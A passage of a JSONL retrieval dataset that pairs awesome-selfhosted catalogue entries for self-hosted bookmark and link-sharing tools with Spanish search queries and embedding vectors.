0.05017, 0.02568, 0.07364, 0.03283, -0.02476, -0.03967, 0.15589, -0.01037, 0.08088, 0.01628, 0.00604, -0.00473, 0.04808, 0.08765, -0.01145, 0.03534, -0.04848, -0.03185, -0.01795, -0.01739, 0.03077, 0.06527, -0.03653, -0.03756, 0.0171, -0.13045, 0.06416, 0.026, 0.01777, 0.07605, 0.17742, -0.07861, 0.07953, -0.09111, 0.0561, -0.02326, -0.03534, -0.0326, -0.03891, 0.03576, 0.01672, 0.00112, -0.10733, 0.00664, 0.03912, 0.00509, -0.10105, -0.04334, 0.00974, -0.00947, -0.0852, 0.02155, -0.00402, -0.02868, 0.04415, -0.10458, -0.02162, -0.07835, -0.02076, -0.01517, 0.01668, -0.02719, -0.00043, -0.03073, 0.07082, -0.01044, -0.0659, 0.06345, -0.00376, -0.04787, 0.00065, 0.04036, 0.06912, -0.02152, 0.03944, 0.061, -0.07816, 0.03876, -0.04996, -0.05231, -0.09053, 0.05029, 0.00776, -0.07884, 0.01717, 0.00016, 0.06826, 0.00526, -0.09278, -0.01874, 0.11762, 0.04362, 0.05211, -0.0608, -0.01142, -0.00531, 0.03047, 0.03189, -0.04677, -0.00691, -0.06387, 0.04693, -0.0299, -0.04236, -0.07357, 0.03274, 0.02221, 0.00075, 0.03527, -0.06354, 0.02255, 0.09064, 0.1025, 0.05712, -0.04072, 0.05103, -0.03026, -0.08654, -0.00438, 0.03352, 0.00666, 0.05128, 0.06103, 0.02252, 0.03088, 0.05187, 0.01065, 0.0399, -0.03546, -0.01972, 0.03273, 0.01155, 0.03115, 0.00414, -0.05402, -0.00191, -0.07149, 0.04199, -0.0112, -0.00898, 0.00732, -0.01109, 0.02244, 0.02877, 0.05897, -0.00111, -0.05458, -0.03095, 0.0175, -0.078, 0.02684, 0.01309, -0.09132, -0.03442, 0.00917, 0.01944, -0.06271, 0.03417, 0.01568]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: Betula β€” Single-user federated bookmark manager with Fediverse support and archives [AGPL-3.0, Go]. Buku β€” Powerful bookmark manager and a personal textual mini-web [GPL-3.0, Python/deb]. Digibunch β€” Create bunches of links to share with your learners or colleagues [AGPL-3.0, Nodejs/PHP]. Espial β€” An open-source, web-based bookmarking server [AGPL-3.0, Haskell]. Faved β€” Handcrafted bookmark manager combining powerful tagging, instant search, and a clean, distraction-free interface. Built for large collections and advanced workflows, optimized for efficiency and ease-of-use [MIT, Docker]. Firefox Account Server β€” Host your own Firefox accounts server [MPL-2.0, Nodejs/Java]. Karakeep β€” Bookmark-everything app with a touch of AI for the data hoarders out there [AGPL-3.0, Docker]. LinkAce β€” Bookmark archive with automatic backups to the Internet Archive, link monitoring, and a full REST API. Installation is done via Docker, or as a simple PHP application [GPL-3.0, Docker/PHP].", "indexar": "cuΓ‘l es una alternativa libre a los gestores de bookmarks que tenga una interfaz limpia?", "v": [0.16519, 0.07318, -0.14412, -0.09041, 0.072, -0.03556, -0.14224, -0.00623, -0.11699, -0.1208, -0.02986, -0.1013, 0.00888, 0.07961, 0.17709, 0.01788, 0.06338, -0.05915, 0.10625, -0.01482, -0.00547, 0.04792, -0.08219, 0.01845, -0.14698, -0.17922, 0.04433, -0.06752, -0.07558, 0.09623, -0.01585, -0.10814, 0.07443, -0.0588, -0.04995, 0.03269, 0.06191, 0.02817, 0.04969, -0.07492, 0.04932, 0.00278, -0.14324, 0.13816, 0.00015, -0.09246, 0.06979, -0.05177, 0.01586, 0.10063, -0.10517, -0.04308, -0.06138, 0.02232, 0.02121, -0.0052, 0.09236, -0.00412, -0.01045, -0.02515, -0.11554, 0.10271, 0.02654, 0.07951, 0.12435, -0.07853, -0.02177, 0.00823, -0.00036, 0.08594, 0.09856, 0.05774, 0.07635, 0.03137, -0.01372, 0.09771, 0.03544, 0.04619, 0.07354, 0.08726, 0.08975, -0.12259, -0.05662, -0.03255, -0.02417, -0.03957, 0.04521, -0.07851, -0.06379, -0.0415, 0.01231, -0.00912, -0.02063, 0.08481, -0.06235, -0.00878, 0.03742, 0.18206, 0.01095, 0.02288, 0.06907, 0.02471, -0.10223, 0.11407, 0.01921, -0.02269, -0.04468, -0.02981, -0.02938, 0.06262, 0.06337, 0.02307, 0.05515, -0.01171, -0.00707, 0.04042, -0.01848, -0.02176, -0.02656, -0.08742, -0.02291, -0.11858, -0.08748, -0.01137, 0.03185, 0.11692, 0.07126, 0.08395, 0.05259, 0.04889, -0.00275, 0.04241, -0.1192, -0.0683, -0.13714, 0.02533, -0.06318, -0.02794, 0.06425, -0.01891, -0.01592, 0.07455, 0.02398, 0.06264, 0.0418, -0.05583, 0.07417, -0.05095, -0.0513, 0.02798, -0.00298, -0.04056, 0.02753, 0.0791, 0.00525, 0.05772, 0.02388, -0.02725, -0.06934, 0.02937, 0.00257, -0.09341, -0.02067, 0.06519, -0.00402, -0.03411, -0.04863, 0.06798, -0.00933, 0.01488, -0.0102, 0.1055, 0.03738, -0.1213, 0.00705, -0.02688, -0.02063, -0.0665, 0.09353, 0.02312, 0.03451, 0.00016, -0.04669, 0.00127, -0.05649, -0.10078, -0.01842, 0.0662, -0.02193, 0.06534, 0.03308, 0.04575, -0.0095, -0.04941, 0.05742, -0.0226, -0.0186, -0.06026, -0.06869, 0.01727, -0.03421, -0.08146, 0.01737, 0.00127, -0.00755, 0.03997, -0.08261, 0.06932, 0.03567, 0.04321, 0.05663, 0.01318, 0.06281, 0.00585, -0.0197, -0.00859, 0.00727, -0.00091, 0.07121, -0.06081, 0.0802, 0.03168, 0.03683, -0.0411, 0.02737, 0.01288, -0.0168, 0.0456, 0.01288, 0.03714, -0.02569, -0.01738, -0.00626, -0.00653, 0.02874, 0.03262, -0.02283, -0.00697, 0.00722, -0.03725, 0.00632, 0.02639, -0.02312, -0.03777, -0.02233, -0.0457, -0.05584, -0.00089, -0.02529, -0.05837, -0.05969, 0.01395, 0.09304, 0.01344, 0.00969, -0.00448]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: linkding β€” Minimal bookmark management with a fast and clean UI. Simple installation through Docker and can run on your Raspberry Pi [MIT, Docker]. LinkWarden β€” Bookmark and archive manager to store your useful links [MIT, Docker/Nodejs]. NeonLink β€” Bookmark service with unique design and simple installation with Docker [MIT, Docker]. Readeck β€” Save the precious readable content of web pages you like and want to keep forever. See it as a bookmark manager and a read later tool [AGPL-3.0, Go/Docker]. Servas β€” A self-hosted bookmark management tool. It allows organization with tags, groups, and a list specifically for later access. It supports multiple users with 2FA. Companion browser extensions are available for Firefox and Chrome [GPL-3.0, Docker/Nodejs/PHP]. Shaarli β€” Personal, minimalist, super-fast, no-database bookmarking and link sharing platform [Zlib, PHP/deb]. Shiori β€” Simple bookmark manager built with Go [MIT, Go/Docker]. Slash β€” An open source, self-hosted bookmarks and link sharing platform [GPL-3.0, Docker].", "indexar": "quΓ© programa puedo usar para guardar mis enlaces favoritos de forma sencilla", "v": [0.0452, 0.17305, -0.20903, -0.1222, 0.00096, -0.04225, -0.01254, -0.11763, -0.13177, -0.18965, -0.03494, -0.08989, -0.08004, -0.06292, 0.04, 0.05772, 0.17289, -0.10273, 0.02074, 0.05102, 0.01991, -0.05011, -0.07929, -0.1104, -0.10581, -0.03175, 0.1386, -0.00185, -0.10694, 0.0193, -0.05953, 0.04316, 0.03945, -0.06979, -0.06892, 0.04311, 0.11647, 0.01992, 0.02383, -0.03368, -0.0296, 0.01348, -0.05522, 0.03329, -0.09655, 0.02132, 0.04535, -0.01557, -0.02133, -0.05001, 0.05608, -0.03841, -0.08865, -0.00653, -0.02655, -0.14777, 0.067, -0.08433, -0.05259, 0.05524, -0.03864, 0.07918, 0.04712, 0.0836, 0.01629, -0.09443, -0.00599, -0.01146, -0.14083, -0.00342, -0.05461, 0.06262, 0.02533, 0.00989, -0.01633, 0.13543, 0.01377, -0.00823, 0.08211, 0.03737, -0.10441, 0.01916, 0.08886, -0.01882, -0.07079, -0.05533, 0.05351, -0.01029, -0.0746, -0.0956, 0.02335, 0.02714, -0.02201, 0.04065, 0.00551, -0.08862, 0.01723, 0.13371, 0.03686, 0.02544, 0.0967, -0.00803, -0.01208, 0.17522, -0.00198, 0.0122, 0.06575, -0.03726, -0.03299, 0.01692, 0.04516, -0.01319, -0.12868, -0.07027, -0.08893, 0.0397, -0.03489, -0.01326, -0.01355, -0.12343, -0.0659, -0.0193, -0.0725, 0.06031, 0.11144, -0.0146, 0.05529, 0.10608, -0.11004, 0.04517, -0.04351, 0.04419, -0.08232, -0.05453, -0.01395, -0.05863, -0.02584, -0.01694, 0.03696, -0.09141, 0.05894, 0.03347, -0.05834, -0.03787, 0.02693, -0.02621, 0.03596, -0.03509, -0.05315, -0.05809, 0.04832, -0.02291, -0.0365, -0.01365, -0.04085, -0.03288, 0.01741, -0.09933, -0.02584, 0.03365, -0.04242, 0.0188, -0.02049, -0.02227, 0.05123, -0.05822, 0.04315, 0.00668, 0.03464, 0.04678, 0.02393, 0.10957, -0.0135, -0.11078, 0.00351, -0.1191, -0.04895, -0.03307, 0.04556, -0.02736, -0.09927, 0.03515, -0.01198, 0.10445, -0.02561, -0.07733, 0.03571, 0.05745, 0.00332, 0.01202, -0.02544, 0.03503, 0.0197, 0.00625, 0.04011, -0.0073, -0.00094, -0.01146, 0.03416, -0.00824, -0.05905, -0.09693, 0.01143, 0.01478, 0.06249, 0.05033, -0.1081, -0.03585, 0.00702, 0.10441, 0.02719, -0.09748, 0.10691, -0.02265, -0.02142, -0.02792, 0.0013, 0.04596, 0.03769, 0.01058, 0.01547, 0.00081, 0.02952, 0.0205, 0.00736, -0.03869, -0.00544, 0.02996, 0.00908, 0.01999, -0.03344, -0.05272, -0.02256, -0.04882, 0.01179, -0.03341, -0.04649, -0.02433, -0.03368, -0.01344, 0.01471, 0.11761, -0.00406, -0.03692, -0.02049, 0.02865, -0.07925, 0.06236, -0.00867, -0.06415, 0.01788, 0.01232, 0.01691, -0.08021, 0.00373, -0.0127]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: linkding β€” Minimal bookmark management with a fast and clean UI. Simple installation through Docker and can run on your Raspberry Pi [MIT, Docker]. LinkWarden β€” Bookmark and archive manager to store your useful links [MIT, Docker/Nodejs]. NeonLink β€” Bookmark service with unique design and simple installation with Docker [MIT, Docker]. Readeck β€” Save the precious readable content of web pages you like and want to keep forever. See it as a bookmark manager and a read later tool [AGPL-3.0, Go/Docker]. Servas β€” A self-hosted bookmark management tool. It allows organization with tags, groups, and a list specifically for later access. It supports multiple users with 2FA. Companion browser extensions are available for Firefox and Chrome [GPL-3.0, Docker/Nodejs/PHP]. Shaarli β€” Personal, minimalist, super-fast, no-database bookmarking and link sharing platform [Zlib, PHP/deb]. Shiori β€” Simple bookmark manager built with Go [MIT, Go/Docker]. Slash β€” An open source, self-hosted bookmarks and link sharing platform [GPL-3.0, Docker].", "indexar": "hay alguna alternativa gratuita a los gestores de bookmark que se instalen con Docker?", "v": [0.05946, 0.0926, -0.1785, -0.09774, 0.01197, 0.00564, -0.01279, 0.0159, -0.14887, -0.1545, -0.06671, -0.08567, 0.00751, -0.08254, 0.15836, -0.03, 0.12197, -0.10866, 0.13805, 0.02152, 0.04027, 0.06829, 0.03039, 0.00284, -0.12763, -0.14426, -0.08451, -0.12045, -0.08165, 0.08427, 0.05899, -0.07944, -0.01642, -0.12242, -0.11207, -0.03742, 0.08343, -0.03302, 0.19185, -0.03087, 0.0867, 0.02042, -0.07988, 0.05777, -0.04061, -0.0542, -0.01706, -0.11583, 0.03692, 0.00439, -0.06401, -0.05598, -0.00017, 0.00642, -0.01061, 0.01847, 0.08691, 0.02428, -0.02237, -0.08107, -0.05779, 0.14312, -0.02357, 0.07734, 0.10143, 0.00595, 0.00229, -0.03959, -0.08227, 0.03416, 0.02923, 0.06778, 0.08245, 0.06458, -0.01062, 0.0964, 0.06296, 0.06924, 0.03899, 0.03437, 0.04972, -0.08293, 0.05051, -0.02233, -0.02586, 0.00427, -0.01614, -0.12642, -0.02425, -0.04079, 0.05619, -0.00419, 0.04648, 0.13763, -0.08091, -0.12819, 0.06511, 0.06363, -0.02331, 0.08206, 0.12023, 0.05646, 0.04067, 0.10708, 0.06613, 0.01905, -0.003, -0.00276, 0.06651, 0.02095, -0.04997, 0.06525, 0.01413, -0.01595, 0.03911, 0.0277, -0.03553, -0.02097, -0.05243, -0.02863, -0.05095, -0.07678, -0.08317, -0.02616, 0.02646, 0.08068, 0.05961, 0.09919, 0.01878, 0.07667, 0.02367, -0.06729, -0.02691, 0.00218, -0.21049, 0.05144, -0.04744, -0.01894, 0.02362, -0.05211, -0.05394, 0.03023, 0.03948, 0.00984, -0.02513, -0.02366, 0.05938, -0.00691, 0.00371, -0.00933, -0.00663, 0.00224, 0.03315, 0.10017, 0.01173, 0.08607, 0.05879, -0.02794, 0.02482, 0.09242, 0.01002, -0.10649, -0.00987, -0.00284, -0.09478, -0.01408, -0.01466, -0.00452, -0.02639, 0.07886, -0.03784, 0.08489, 0.02721, -0.04243, 0.01029, -0.03794, -0.00439, -0.0195, 0.07459, -0.03042, 0.07989, -0.04786, 0.00045, 0.0111, -0.02666, -0.12351, -0.0629, 0.0602, -0.01252, 0.04101, 0.08249, 0.03935, -0.05176, -0.03425, 0.03289, -0.05087, 0.02058, -0.05889, -0.05145, 0.0828, -0.0611, -0.06232, -0.0619, 0.01925, 0.00206, 0.03596, -0.08761, 0.11625, 0.00883, 0.06775, -0.02215, 0.03908, 0.02386, -0.04202, 0.00069, 0.01424, 0.03194, 0.0116, 0.02151, -0.0366, 0.05526, -0.02518, 0.05835, -0.00321, -0.01764, -0.00682, -0.01141, 0.05403, -0.02146, 0.05666, -0.00487, -0.01393, 0.07117, 0.02169, -0.00534, 0.01851, 0.00347, 0.00163, -0.03078, -0.02285, 0.0009, 0.06758, 0.02332, 0.01418, -0.05909, -0.01372, -0.04937, -0.0398, 0.01333, -0.07215, 0.01523, 0.05394, 0.01866, 0.00251, -0.03256, 0.03078]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: linkding β€” Minimal bookmark management with a fast and clean UI. Simple installation through Docker and can run on your Raspberry Pi [MIT, Docker]. LinkWarden β€” Bookmark and archive manager to store your useful links [MIT, Docker/Nodejs]. NeonLink β€” Bookmark service with unique design and simple installation with Docker [MIT, Docker]. Readeck β€” Save the precious readable content of web pages you like and want to keep forever. See it as a bookmark manager and a read later tool [AGPL-3.0, Go/Docker]. Servas β€” A self-hosted bookmark management tool. It allows organization with tags, groups, and a list specifically for later access. It supports multiple users with 2FA. Companion browser extensions are available for Firefox and Chrome [GPL-3.0, Docker/Nodejs/PHP]. Shaarli β€” Personal, minimalist, super-fast, no-database bookmarking and link sharing platform [Zlib, PHP/deb]. Shiori β€” Simple bookmark manager built with Go [MIT, Go/Docker]. Slash β€” An open source, self-hosted bookmarks and link sharing platform [GPL-3.0, Docker].", "indexar": "con quΓ© herramienta puedo organizar mis links y tener una vista rΓ‘pida sin base de datos pesada", "v": [-0.03097, 0.1373, -0.20353, -0.14814, 0.02298, -0.05421, -0.07244, -0.02515, -0.09796, -0.11309, -0.10272, -0.11276, -0.02245, -0.07988, 0.14625, 0.07272, 0.10353, -0.11416, 0.03723, -0.06159, -0.04372, -0.07243, -0.07696, -0.0493, -0.12026, -0.07887, 0.12893, 0.02581, -0.26285, 0.07486, -0.08548, 0.05506, -0.01677, 0.01678, -0.04483, -0.00191, -0.03628, 0.10065, -0.01957, -0.07475, -0.15096, 0.14061, -0.07552, 0.07402, 0.06367, -0.01921, -0.05659, 0.05338, 0.00904, 0.00282, -0.07077, -0.04624, -0.13177, -0.06634, -0.04078, -0.22177, 0.09732, -0.07612, 0.07647, 0.02319, -0.04404, 0.08044, -0.00929, -0.00467, -0.02484, 0.06011, -0.01378, -0.03663, -0.0082, 0.06405, -0.03103, 0.0178, -0.03126, -0.03081, 0.03734, -0.03175, 0.07308, 0.13577, -0.0272, 0.06802, 0.02322, -0.01803, -0.08853, 0.05417, -0.06275, -0.1197, 0.05611, 0.03862, -0.00359, -0.07349, 0.05892, 0.05587, -0.03564, 0.00529, 0.00703, -0.00998, 0.02035, 0.00299, 0.0359, -0.02168, 0.07072, -0.03536, -0.04826, 0.08427, -0.00563, -0.02209, 0.02691, 0.0783, -0.10554, -0.02391, 0.00449, -0.00321, -0.00388, -0.00708, -0.06276, -0.0473, -0.04782, -0.02601, -0.03739, -0.0234, 0.05362, -0.02445, 0.023, 0.00638, -0.0469, -0.04472, -3e-05, 0.15159, -0.00965, 0.01821, 0.03113, -0.05873, -0.06284, 0.01095, 0.0785, 0.00156, -0.09249, -0.13786, 0.07844, -0.07653, -0.05969, 0.03259, -0.0755, -0.07117, 0.03176, -0.05172, 0.04835, 0.02098, -0.09909, -0.03216, 0.01526, -0.01909, 0.04503, 0.00596, -0.07431, -0.00999, -0.03571, -0.02326, -0.05975, -0.01842, -0.07027, 0.00878, -0.00499, 0.01286, 0.02093, -0.10495, 0.07704, 0.04079, -0.00716, 0.07893, -0.03714, 0.04818, -0.00093, -0.05097, 0.03619, -0.07576, -0.07837, -0.03886, -0.02344, -0.05173, 0.04011, -0.01303, -0.0317, -0.00871, 0.00483, -0.06403, 0.02296, -0.04105, 0.01294, -0.02539, 0.04619, 0.08983, 0.05734, -0.09525, 0.07764, -0.05091, -0.06456, -0.04644, 0.08057, 0.00422, -0.04943, -0.08344, 0.00703, 0.01657, -0.00629, 0.03251, -0.0249, -0.03461, -0.00392, 0.03358, 0.00993, -0.02349, 0.02685, -0.02349, -0.06378, -0.04126, 0.03047, 0.0002, 0.01551, -0.0045, -0.01422, 0.05349, 0.05475, -0.00358, -0.03355, -0.02283, 0.03158, -0.0047, 0.0482, 0.02929, -0.00452, -0.06192, 0.00792, -0.00929, 0.0476, -0.06861, -0.00432, -0.03571, -0.0323, 0.01522, -0.00376, 0.03496, -0.01445, -0.03499, -0.04095, -0.03049, -0.02104, 0.0511, -0.02623, -0.09718, -0.01731, -0.00702, 0.10743, -0.07327, -0.02025, 0.01206]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: SyncMarks β€” Sync and manage your browser bookmarks from Edge, Firefox and Chromium [AGPL-3.0, PHP].", "indexar": "que programa puedo usar para sincronizar mis marcadores entre diferentes navegadores", "v": [0.10155, -0.0026, -0.17377, -0.11785, -0.00648, 0.01398, 0.05168, -0.07982, -0.11764, -0.16822, 0.03683, -0.01101, -0.01488, -0.10153, 0.02581, 0.12701, 0.07385, -0.04464, 0.02968, 0.04881, 0.04602, -0.11576, 0.02022, -0.0688, -0.08218, 0.01767, -0.07102, -0.08031, -0.08634, -0.00692, -0.14931, 0.03233, 0.14843, -0.05708, -0.04345, -0.09925, 0.08057, -0.05498, 0.00252, 0.05708, 0.00948, 0.01362, -0.13715, -0.04645, -0.0383, 0.04524, -0.0114, -0.02991, -0.06502, -0.04314, 0.06574, -0.00157, -0.15123, 0.07744, -0.02947, -0.10241, 0.12333, -0.05732, 0.00301, 0.02283, 0.07839, 0.04274, 0.03348, 0.00104, 0.08078, -0.10367, 0.02084, -0.01983, -0.0728, 0.04319, 0.05482, 0.09294, 0.0547, -0.04349, 0.04817, 0.2378, -0.04111, -0.01834, 0.10857, 0.04623, 0.01974, -0.01782, -0.01635, 0.02738, -0.1321, -0.08392, 0.06129, -0.02884, 0.0505, -0.10675, 0.08538, 0.13282, -0.0223, 0.03147, 0.03705, -0.07644, 0.10247, 0.01517, 0.05782, 0.07703, 0.06953, -0.02992, -0.04186, 0.12328, -0.01462, 0.01257, 0.10067, -0.08471, 0.01943, -0.02266, 0.01223, -0.02736, -0.09943, -0.10831, -0.03758, 0.08686, -0.00418, -0.07812, 0.04058, -0.16805, -0.10619, -0.02435, -0.08331, -0.01194, 0.12371, 0.02447, 0.03277, 0.05329, -0.03558, 0.06032, 0.01012, 0.00381, -0.06373, -0.02218, -0.11746, -0.00851, -0.03171, -0.0668, 0.06373, 0.00676, 0.05634, 0.02286, -0.03413, 0.01085, 0.0608, 0.0059, -0.01599, -0.08657, -0.10904, -0.02145, 0.03608, -0.0189, 0.00268, 0.02996, -0.06638, 0.01758, 0.02577, 0.00077, -0.03788, 0.0373, -0.08412, 0.01265, 0.04862, 0.04403, 0.05437, -0.06513, -0.05669, -0.02505, 0.09441, 0.04047, -0.01456, 0.08773, 0.04306, -0.08032, 0.04899, -0.0441, -0.04973, 0.00983, 0.03635, -0.05735, -0.00608, 0.01248, 0.03776, -0.01749, -0.05107, -0.06353, -0.05578, 0.03887, -0.04124, 0.01792, -0.03727, 0.00699, 0.02485, -0.00145, 0.01496, -0.01649, 0.0282, -0.02749, 0.01484, -0.06254, 0.00256, -0.0217, 0.01577, -0.0247, 0.06327, 0.06569, -0.03823, 0.04415, 0.08682, 0.1192, 0.01529, -0.09311, 0.06221, -0.00649, -0.01775, -0.01912, -0.00606, 0.01741, 0.04224, -0.0308, 0.01664, 0.04075, 0.02652, 0.02345, -0.01935, -0.02245, 0.04537, -0.02619, -0.03124, 0.02589, -0.02714, -0.02041, -0.03907, -0.01793, 0.03373, 0.0111, -0.02694, -0.03232, -0.00542, -0.04722, -0.063, 0.07639, 0.03326, -0.04258, -0.02979, -0.04708, -0.0894, -0.02211, 0.00058, 0.0147, -0.00499, 0.087, 0.06497, -0.05707, 0.00471, 0.0555]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: SyncMarks β€” Sync and manage your browser bookmarks from Edge, Firefox and Chromium [AGPL-3.0, PHP].", "indexar": "hay alguna herramienta libre para gestionar y compartir enlaces desde mi navegador", "v": [0.00753, 0.16196, -0.15918, -0.24652, -0.06063, -0.08707, -0.08102, -0.00536, -0.07082, -0.18886, -0.03366, -0.10738, -0.02873, -0.08512, 0.12202, 0.11963, 0.15132, -0.1193, -0.00865, 0.01311, -0.05481, 0.09068, -0.05785, -0.04562, -0.06298, -0.15002, 0.06568, -0.06645, -0.09965, 0.00565, -0.05593, -0.03141, 0.00198, -0.0251, -0.02276, -0.0039, 0.14187, 0.05066, 0.08681, -0.1342, -0.06073, 0.00645, -0.10938, 0.0738, -0.03147, 0.00704, -0.05479, -0.06209, 0.01212, 0.0094, -0.04433, -0.10601, -0.16404, -0.00813, -0.0595, -0.04827, 0.20216, -0.13156, 0.02885, -0.09485, -0.0702, 0.07752, -0.04047, 0.01345, -0.04741, -0.06093, 0.04204, -0.0367, -0.11661, 0.16097, -0.00805, 0.00741, -0.00484, 0.07272, -0.00538, 0.03181, 0.07643, 0.07316, 0.07797, 0.05235, 0.07543, -0.00397, -0.00033, -0.00325, -0.01609, -0.0655, 0.06557, -0.05274, 0.01485, -0.00942, 0.02671, 0.06103, -0.07184, -0.05131, -0.08114, -0.07257, 0.02211, 0.02244, 0.05456, 0.00479, 0.10597, 0.0246, -0.03575, 0.08603, 0.01412, 0.02032, 0.01562, -0.05415, -0.02455, 0.0418, 0.06486, -0.00212, 0.02608, -0.05236, -0.02066, 0.13389, -0.02632, -0.04636, -0.01731, -0.09915, -0.02832, -0.04422, -0.12059, -0.00018, -0.01027, 0.01779, 0.0132, 0.11738, -0.032, -0.05666, -0.04138, -0.07029, -0.07079, -0.02674, -0.02179, 0.02998, 0.01351, -0.07903, -0.01346, -0.11062, -0.08158, 0.01681, -0.04019, -0.05976, 0.05658, -0.04125, -0.02014, -0.03447, -0.02905, -0.07522, 0.00911, -0.08563, -0.02814, -0.00896, -0.00695, 0.04436, -0.05587, 0.02055, -0.07497, 0.03039, -0.02853, -0.00191, 0.03664, 0.04655, 0.02481, 0.01603, -0.00449, 0.03632, 0.06186, 0.05513, 0.00302, 0.07894, 0.05226, -0.05116, 0.03414, -0.10062, -0.03783, -0.05363, 0.01043, -0.03853, 0.02931, -0.02507, -0.0469, 0.03827, -0.05354, -0.06754, 0.0284, 0.04967, -0.04728, 0.03568, 0.01889, 0.01082, -0.01182, -0.02496, 0.14735, 0.01844, -0.0537, -0.07351, 0.02012, 0.03367, -0.06119, -0.07024, 0.03054, -0.01589, -0.02236, 0.04923, 0.02066, -0.03278, 0.05068, 0.03846, 0.02226, -0.00095, 0.02614, -0.03997, -0.04752, -0.0155, 0.06297, 0.01789, 0.00524, -0.01714, 0.01128, 0.01285, 0.04198, -0.02714, 0.02413, 0.03921, 0.02902, 0.02494, -0.03904, 0.01469, 0.02139, -0.02558, -0.03142, -0.02706, 0.02292, -0.06055, 0.03692, -0.01952, -0.03254, 0.0272, 0.00642, 0.05064, 0.0548, -0.0594, -0.04448, -0.02765, -0.05457, -0.02723, -0.00729, -0.07841, -0.03275, -0.02162, 0.02832, -0.0401, -0.04544, 0.02321]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: SyncMarks β€” Sync and manage your browser bookmarks from Edge, Firefox and Chromium [AGPL-3.0, PHP].", "indexar": "cual es una alternativa a la gestiΓ³n de favoritos que funcione con Edge, Firefox y Chromium", "v": [-0.14076, 0.04599, -0.10466, -0.02637, 0.08837, -0.00577, -0.03836, 0.0735, -0.10091, -0.19759, 0.01894, -0.07426, -0.10401, -0.06865, 0.13411, -0.14107, 0.07995, -0.08866, -0.02661, -0.00421, -0.07065, 0.04087, -0.09609, -0.13234, 0.02239, -0.06209, -0.0565, 0.0112, -0.07894, -0.02704, 0.14546, 0.07426, 0.17063, 0.04748, 0.02118, -0.01128, 0.10341, 0.00461, -0.01067, 0.01095, 0.00543, 0.03458, -0.08514, 0.07924, -0.04012, -0.05248, -0.05992, -0.01311, 0.2181, 0.07848, -0.09956, -0.07348, -0.11939, 0.10376, -0.04034, 0.06556, 0.08225, -0.08752, -0.01165, -0.01168, 0.01714, -0.01814, 0.0231, -0.00383, 0.02088, -0.01935, -0.03537, -0.00231, -0.00207, 0.09873, -0.03657, -0.011, -0.15759, -0.02869, -0.02324, 0.054, 0.03487, 0.05583, 0.05356, 0.04619, 0.10013, -0.08424, -0.06764, 0.02977, -0.18244, -0.06914, -0.03541, -0.04715, -0.05162, 0.00826, 0.01375, -0.05543, -0.0537, 0.0277, 0.00765, -0.02963, 0.05342, -0.03928, 0.08422, -0.039, 0.1354, 0.02115, -0.04276, 0.11039, 0.05485, 0.04053, 0.05157, -0.02498, -0.04406, 0.08404, -0.04263, 0.02634, -0.01809, 0.04164, -0.02515, -0.01668, -0.08192, 0.00707, 0.01367, -0.05546, -0.13388, -0.01396, -0.09151, -0.14854, 0.1119, 0.09827, 0.00537, -0.02718, -0.06672, 0.011, 0.0648, -0.00876, -0.05507, -0.06608, -0.13217, 0.06591, -0.00722, 0.06543, 0.02043, -0.02642, 0.05953, 0.01045, -0.02517, 0.07816, 0.12831, -0.1165, -0.01407, 0.03254, 0.0098, -0.00745, -0.03342, -0.0586, 0.00701, 0.06463, -0.1426, -0.01385, -0.09724, 0.03768, -0.03655, 0.05734, 0.05745, -0.07609, 0.01779, 0.09606, -0.05937, -0.00118, -0.01854, 0.03771, -0.02802, -0.03815, 0.01194, 0.08883, -0.04894, -0.06403, -0.00353, -0.07941, -0.00723, -0.05022, 0.15079, 0.00909, 0.00744, 0.00371, -0.02067, 0.04553, -0.0135, -0.07691, -0.08559, 0.03521, -0.09768, 0.01082, 0.02864, -0.048, -0.03545, -0.04365, -0.0167, 0.0547, -0.00527, -0.06249, -0.01028, -0.03142, -0.06255, 0.00173, 0.01019, -0.01744, -0.03286, -0.00936, -0.01267, 0.00992, 0.04432, -0.00604, 0.03742, 0.00956, 0.041, 0.02718, 0.02709, 0.00242, 0.03096, -0.03151, -0.01076, -0.04575, 0.03839, -0.03355, -0.02641, -0.01154, 0.00571, -0.05269, 0.00379, 0.01891, -0.01681, -0.02787, -0.01879, -0.0614, 0.01681, 0.00962, 0.02721, 0.00132, 0.01972, -0.04388, -0.04291, -0.0711, 0.0055, 0.06728, 0.02924, -0.00178, 0.01077, 